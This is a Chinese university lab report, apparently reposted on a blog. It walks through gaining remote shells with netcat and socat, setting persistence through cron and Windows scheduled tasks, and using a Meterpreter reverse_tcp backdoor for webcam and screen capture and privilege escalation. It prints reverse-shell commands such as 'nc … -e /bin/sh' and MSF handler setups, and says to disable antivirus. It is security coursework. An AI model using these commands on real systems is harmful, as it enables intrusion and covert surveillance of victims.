首页 > 其他分享 >20222425 2024-2025-1《网络与系统攻防技术》 实验二实验报告

20222425 2024-2025-1《网络与系统攻防技术》 实验二实验报告

时间:2024-10-21 15:45:35浏览次数:9  
标签:后门 获取 2024 2025 20222425 3.3 socat MSF meterpreter

目录
1.实验内容
2.实验问题
3.实验过程
3.1 windows下使用netcat获取kali的Shell,用cron命令启动某项任务
3.1.1 使用netcat 获取kali的shell
3.1.2 用cron命令启动某项任务
3.2 kali下使用socat获取windows的Shell, 用schtasks命令创建并启动某项任务计划
3.2.1 实验准备
3.2.2 使用socat获取windows的Shell
3.2.3 用schtasks命令创建并启动某项任务计划
3.2.4 查看任务计划执行情况
3.3 使用MSF meterpreter生成后门文件,利用ncat或socat传送到主机并运行,获取主机Shell
3.3.1 实验准备
3.3.2 使用MSF meterpreter生成后门文件
3.3.3 利用ncat或socat将后门文件传送到主机
3.3.4 进入kali的MSF控制台,开始准备监听
3.3.5 kali保持监听,windows上打开后门程序,成功获取shell
3.4 使用MSF meterpreter生成后门文件,获取目标主机音频、摄像头、击键记录等内容,并尝试提权
3.4.1 查看获取windows的shell后可以进行的渗透操作
3.4.2 获取系统信息、当前屏幕,摄像头抓拍照片

3.4.3 尝试提权
3.4.4 尝试获取破解密码
3.5 使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell
3.5.1 使用MSF生成shellcode
3.5.2 构造攻击字符串并运行pwn20222425文件
3.5.3 成功获取shell
4.问题及解决方案
5.学习感悟、思考等
参考资料
2.实验问题
例举你能想到的一个后门进入到你系统中的可能方式?
类似于实践1中的pwn1,一些软件可能存在安全漏洞,攻击者可以利用这些漏洞将后门文件注入到我的系统中。
例举你知道的后门如何启动起来(win及linux)的方式?
Windows
①作为服务被安装后自动运行。
②创建计划任务,以便在特定条件下自动运行。
③后门可以将自己复制到Windows启动文件夹中,例如C:\Users{用户名}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup,以确保在用户登录后自动运行。
Linux
创建cron作业定期执行。
Meterpreter有哪些给你映像深刻的功能?
远程shell、屏幕/摄像头获取、提权后破解密码。
如何发现自己有系统有没有被安装后门?
①使用安全扫描工具(如火绒杀毒软件)对系统进行全面扫描。
②审查系统日志查找异常活动的迹象。
③定期检查文件系统。
3.实验过程
3.1使用netcat获取主机操作Shell,cron启动某项任务
3.1.1在主机和虚拟机上都安装netcat。
3.1.2Windows主机使用netcat 获取kali的shell
windows: ncat -l -p 2425[端口号]
linux: nc 192.168.96.221[windows ip] 2425 -e /bin/sh


3.1.3 用cron命令启动某项任务

如图为具体代码,其任务是每分钟向20222425_shiyan2中添加20222425。

3.2使用socat获取主机操作Shell, 任务计划启动
3.2.1关闭电脑的杀毒软件和防火墙
3.2.2在主机和虚拟机都下载socat
3.2.3按下win+R输入compmgmt.msc打开计算机管理,并创建名为20222425EXp2的任务,触发器设为当用户站锁定时,启动程序为socat,添加路径为socat.exe所在位置。



按下win+l重新解锁就能看见socat程序启动


3.3使用MSF meterpreter生成后门文件,利用ncat或socat传送到主机并运行,获取主机Shell
3.3.1 使用MSF meterpreter生成后门文件

3.3.2利用ncat或socat将后门文件传送到主机
┌──(root㉿kali)-[/home/kali]
└─# nc 192.168.31.128 2425 < 20222425backdoor //文件要传给windows,ip地址为windows地址
D:\ncat>ncat.exe -l -p 2425 > 20222425backdoor.exe

3.3.3进入kali的MSF控制台,开始准备监听


msfconsole //进入MSF控制台
use exploit/multi/handler //使用监听模块
set payload windows/meterpreter/reverse_tcp //使用和生成后门程序时相同的payload
set LHOST 192.35.130 //和之前生成后门程序时设置的kali的IP相同
set LPORT 2425 //和之前生成后门程序时设置的端口相同
show options //显示参数配置情况,检查参数是否正确设置
exploit //开启监听
3.3.4kali保持监听,windows上打开后门程序,成功获取shell

3.4使用MSF meterpreter生成后门文件,获取目标主机音频、摄像头、击键记录等内容,并尝试提权(从上一步继续即可)
3.4.1获取系统信息、当前屏幕,摄像头抓拍照片等
meterpreter > sysinfo
meterpreter > screenshare
meterpreter > webcam_snap



3.5使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell
3.5.1生成shellcode文件

3.5.2然后输入msfconsole指令,依次输入以下指令
use exploit/multi/handler #进入handler模式
set payload linux/x86/meterpreter/reverse_tcp #对应生成的后门程序设置payload
set LHOST 192.168.35.130 #LHOST
set LPORT 2425 #端口号

3.5.3打开另一个终端,升权并执行pwn文件


结果如图:

4问题及解决方案
问题1.任务一和任务二下载所需的netcat和socat时未关闭杀毒软件和防火墙,安装包解压后呗提醒危险并被清理。
解决方法:将杀毒软件关闭
问题2.通过socat和netcat操作生成的文件也会被杀毒软件清理。
解决方法:将杀毒软件关闭
5.学习感悟和思考
通过本次实验我实践了简单的后门攻击,这让我大为震撼,如果生活中不注意真的很容易遭遇攻击。在这次实验中我使用了necat,socat等工具,通过借鉴学长学姐的实验报告,我也成功复现了每一步操作,并学会了一系列操作,在这次实验中,虽然没有详细的实验指导书,但实验环境并没有改变,实验所需的资源等也都可以通过查询得到,所以这次实验难度小于实验一。同时我深入了解了后门原理,并通过自己生成后门程序、反弹式连接等操作获得了其他主机的访问权与控制权。这一系列操作让我对这门课有了更深的思考。

标签:后门,获取,2024,2025,20222425,3.3,socat,MSF,meterpreter
From: https://www.cnblogs.com/2425nj/p/18487582

相关文章

  • 2024年游戏买量应该怎么玩?
    本人从事游戏行业多年,一直做游戏分发的工作,但近年来随着我国大经济背景的整体向下,不仅仅影响了实体企业,游戏行业买量也明显受到影响。2024年,游戏买量市场呈现出以下几个主要特点:小游戏买量爆发:小游戏买量投入同比大幅增长,甚至超过了APP游戏。这主要是因为小游戏开发成本......
  • 2024.10.21 杂题
    2024.10.21杂题P11217【MX-S4-T1】「yyOIR2」youyou的垃圾桶\(O(n\logn)\)线段树二分不会,想写\(O(q\log^2n)\)的二分,但是htdlz说常数大可能过不去。所以我选择写树状数组实现的\(O(q\log^2n)\)做法然后跑的飞快比线段树二分还快直接过了(doge)记录前缀和\(s[i......
  • 内衣迷你洗衣机什么牌子好?内衣洗衣机2024年口碑指数排行榜推荐
    内衣专用的洗衣机是一种专门设计用于洗涤内衣和贴身衣物的小型洗衣机。相比于普通的大型洗衣机,这样的小型洗衣机在设计和功能上有很大的区别。内衣专用的迷你洗衣机可以有效地保护内衣和贴身衣物的质量和卫生。在传统的洗衣机中,如果经常将内衣裤、袜子这些贴身衣物与其他大件衣......
  • 20241021比赛总结
    T1岛屿https://www.gxyzoj.com/d/hzoj/p/4177显然每个点只增加了一条边,最终每个点的度数都为2,所以最终必然是很多个环,连边的过程中,也必然是一些链和一些环由题,蓝同色链的个数和红同色链的个数相等,所以设\(f(a,b)\)为a条红同色链,b条异色链的期望考虑先处理异色链:红红连红蓝为......
  • 常用的10款文件加密软件分享|2024办公文件怎么加密?赶快码住!
    在2024年,数据泄露和信息被盗的风险日益增加,因此,文件加密成为了保护敏感信息的重要手段。本文将介绍10款常用的文件加密软件,帮助您在办公中确保文件的安全。1.Ping32Ping32是一款专为企业和个人设计的文件加密软件,具备多层次的安全防护机制。它支持AES-256加密算法,并提供文......
  • 十款超级好用的文档加密软件推荐|2024文档加密软件排行榜
    在信息安全日益重要的今天,文档加密软件成为了保护敏感数据不可或缺的工具。2024年,市场上涌现了许多功能强大、易于使用的文档加密软件。本文将为您推荐十款超级好用的文档加密软件,其中Ping32文档加密软件以其卓越的性能和全面的功能位居榜首。1.Ping32文档加密软件Ping32是......
  • 2024最新Java八股文总结!
    1、请写出你最常见的5个RuntimeException   难度系数:⭐java.lang.NullPointerException空指针异常;出现原因:调用了未经初始化的对象或者是不存在的对象。java.lang.ClassNotFoundException指定的类找不到;出现原因:类的名称和路径加载错误;通常都是程序试图通过字符串来加......
  • ChatGPT-4国内中文版镜像网站整理合集(2024/10/21)
    ​绝对好用的收集ChatGPT镜像网站的开源项目镜像站收集开源项目chatgpt-mirror-site 收集各种可以的ChatGPT镜像网站,免费的收费的。支持4o以及o1,支持MJ绘画一、GPT中文镜像站1.什么是镜像站镜像站(MirrorSite)是指通过复制原始网站内容和结构,创建的备用网站。其主要目的是在......
  • 1990-2024历年高考真题pdf合集(高清重绘文字去水印版),轻松备考!
    高考,对于无数学子来说,是人生中的一场大考,是一次决定未来的重要转折。面对日益激烈的竞争,你是否也在为如何高效备考而苦恼?是不是想找一份全面、权威、分类清晰的高考真题资料,却苦于市面上的资源杂乱无章、价格高昂?今天,我要为你推荐一份值得收藏的“宝藏资源”——1990年到2024......
  • 设置显示或者隐藏MasterSeeker和Total Commander主窗口的快捷键的AutoHotkey脚本2024.
    设置显示或者隐藏MasterSeeker和TotalCommander主窗口的快捷键的AutoHotkey脚本2024.10.21=========  ;========设置显示或者隐藏MasterSeeker和TotalCommander主窗口的快捷键的AutoHotkey脚本2024.10.21=========;此脚本从此行开始;D:\app\RegHotkey\RegHotkey.a......